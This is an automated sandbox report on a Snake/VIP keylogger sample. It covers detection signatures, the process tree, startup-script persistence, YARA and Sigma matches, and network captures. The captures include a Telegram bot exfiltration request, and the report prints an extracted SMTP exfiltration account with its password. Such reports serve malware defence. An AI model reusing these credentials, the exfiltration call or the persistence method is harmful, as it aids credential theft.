Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kG713MWffq.exe

Overview

General Information

Sample name:kG713MWffq.exe
renamed because original name is a hash value
Original sample name:234de89344361f41fff065be295947074a51257428f12838e535c2ec5ca37ced.exe
Analysis ID:1529782
MD5:e483d0750dcf2ed63e9fe1e649e7708b
SHA1:ddb519886ad5f4c2b986b2e8fed3ac41bb4a632f
SHA256:234de89344361f41fff065be295947074a51257428f12838e535c2ec5ca37ced
Tags:exeRedLineStealeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • kG713MWffq.exe (PID: 7800 cmdline: "C:\Users\user\Desktop\kG713MWffq.exe" MD5: E483D0750DCF2ED63E9FE1E649E7708B)
    • vexplores.exe (PID: 7932 cmdline: "C:\Users\user\Desktop\kG713MWffq.exe" MD5: E483D0750DCF2ED63E9FE1E649E7708B)
      • svchost.exe (PID: 8104 cmdline: "C:\Users\user\Desktop\kG713MWffq.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 7260 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • vexplores.exe (PID: 7400 cmdline: "C:\Users\user\AppData\Local\Videos\vexplores.exe" MD5: E483D0750DCF2ED63E9FE1E649E7708B)
      • svchost.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Local\Videos\vexplores.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3867759274.00000000054F8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 60 entries
            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            7.2.svchost.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            4.2.svchost.exe.400000.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x1300:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1fdd0:$s5: delete[]
            • 0x1f288:$s6: constructor or from DllMain.
            4.2.svchost.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
            • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
            • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
            • 0x700:$s3: 83 EC 38 53 B0 D8 88 44 24 2B 88 44 24 2F B0 78 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
            • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
            • 0x1e9d0:$s5: delete[]
            • 0x1de88:$s6: constructor or from DllMain.
            4.2.svchost.exe.7d50000.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 155 entries

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs" , ProcessId: 7260, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.230.214.164, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\svchost.exe, Initiated: true, ProcessId: 8104, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49725
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\kG713MWffq.exe", CommandLine: "C:\Users\user\Desktop\kG713MWffq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\kG713MWffq.exe", ParentImage: C:\Users\user\AppData\Local\Videos\vexplores.exe, ParentProcessId: 7932, ParentProcessName: vexplores.exe, ProcessCommandLine: "C:\Users\user\Desktop\kG713MWffq.exe", ProcessId: 8104, ProcessName: svchost.exe
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs" , ProcessId: 7260, ProcessName: wscript.exe
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\kG713MWffq.exe", CommandLine: "C:\Users\user\Desktop\kG713MWffq.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\kG713MWffq.exe", ParentImage: C:\Users\user\AppData\Local\Videos\vexplores.exe, ParentProcessId: 7932, ParentProcessName: vexplores.exe, ProcessCommandLine: "C:\Users\user\Desktop\kG713MWffq.exe", ProcessId: 8104, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Videos\vexplores.exe, ProcessId: 7932, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vexplores.vbs
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-09T12:13:24.632122+020028033053Unknown Traffic192.168.2.849709188.114.97.3443TCP
              2024-10-09T12:13:28.389130+020028033053Unknown Traffic192.168.2.849715188.114.97.3443TCP
              2024-10-09T12:13:29.697584+020028033053Unknown Traffic192.168.2.849717188.114.97.3443TCP
              2024-10-09T12:13:30.944903+020028033053Unknown Traffic192.168.2.849719188.114.97.3443TCP
              2024-10-09T12:13:33.512913+020028033053Unknown Traffic192.168.2.849723188.114.97.3443TCP
              2024-10-09T12:13:46.686856+020028033053Unknown Traffic192.168.2.849728188.114.97.3443TCP
              2024-10-09T12:13:55.013930+020028033053Unknown Traffic192.168.2.849740188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-09T12:13:22.695857+020028032742Potentially Bad Traffic192.168.2.849707193.122.6.16880TCP
              2024-10-09T12:13:24.055222+020028032742Potentially Bad Traffic192.168.2.849707193.122.6.16880TCP
              2024-10-09T12:13:25.320876+020028032742Potentially Bad Traffic192.168.2.849710193.122.6.16880TCP
              2024-10-09T12:13:26.570853+020028032742Potentially Bad Traffic192.168.2.849712193.122.6.16880TCP
              2024-10-09T12:13:44.852153+020028032742Potentially Bad Traffic192.168.2.849726193.122.6.16880TCP
              2024-10-09T12:13:46.117764+020028032742Potentially Bad Traffic192.168.2.849726193.122.6.16880TCP
              2024-10-09T12:13:47.508378+020028032742Potentially Bad Traffic192.168.2.849729193.122.6.16880TCP
              2024-10-09T12:13:48.774029+020028032742Potentially Bad Traffic192.168.2.849731193.122.6.16880TCP
              2024-10-09T12:13:50.227142+020028032742Potentially Bad Traffic192.168.2.849733193.122.6.16880TCP
              2024-10-09T12:13:51.539676+020028032742Potentially Bad Traffic192.168.2.849735193.122.6.16880TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: kG713MWffq.exeAvira: detected
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeAvira: detection malicious, Label: HEUR/AGEN.1321293
              Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587", "Version": "4.4"}
              Source: 7.2.svchost.exe.3774f2e.1.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs@astonherald.com", "Password": "office12#", "Host": "smtp.zoho.eu", "Port": "587"}
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeReversingLabs: Detection: 68%
              Source: kG713MWffq.exeReversingLabs: Detection: 68%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeJoe Sandbox ML: detected
              Source: kG713MWffq.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: kG713MWffq.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49727 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49744 version: TLS 1.2
              Source: Binary string: _.pdb source: svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0791FB20h4_2_0791FB6F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0791FB20h4_2_0791F962
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AE2FCh4_2_082AE050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AD5F4h4_2_082AD348
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AE754h4_2_082AE4A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_082A08B6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082A31BEh4_2_082A30EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AEBACh4_2_082AE900
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082A0F50h4_2_082A0D70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082A18DAh4_2_082A0D70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AF004h4_2_082AED58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082A31BEh4_2_082A2DA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AF45Ch4_2_082AF1B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082A31BEh4_2_082A2D92
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AF8B4h4_2_082AF608
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AFD0Ch4_2_082AFA60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_082A0280
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_082A0A96
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082AD19Ch4_2_082ACEF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082ADA4Ch4_2_082AD7A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082ADEA4h4_2_082ADBF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 082A2A74h4_2_082A27C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 053CFB20h7_2_053CF962
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 053CFB20h7_2_053CFB6F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873FD0Ch7_2_0873FA60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873E2FCh7_2_0873E050
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087331BEh7_2_087330EC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_087308B6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873E754h7_2_0873E4A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 08730F50h7_2_08730D70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087318DAh7_2_08730D70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873F004h7_2_0873ED58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873EBACh7_2_0873E900
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873F45Ch7_2_0873F1B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087331BEh7_2_08732DA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 087331BEh7_2_08732D9A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873F8B4h7_2_0873F608
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873D19Ch7_2_0873CEF0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_08730A96
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h7_2_08730280
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873D5F4h7_2_0873D348
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873DEA4h7_2_0873DBF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 08732A74h7_2_087327C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 0873DA4Ch7_2_0873D7A0

              Networking

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.122.6.168 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.214.164 587Jump to behavior
              Source: unknownDNS query: name: api.telegram.org
              Source: Yara matchFile source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: global trafficTCP traffic: 192.168.2.8:49725 -> 185.230.214.164:587
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20and%20Time:%2009/10/2024%20/%2018:08:35%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20910646%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
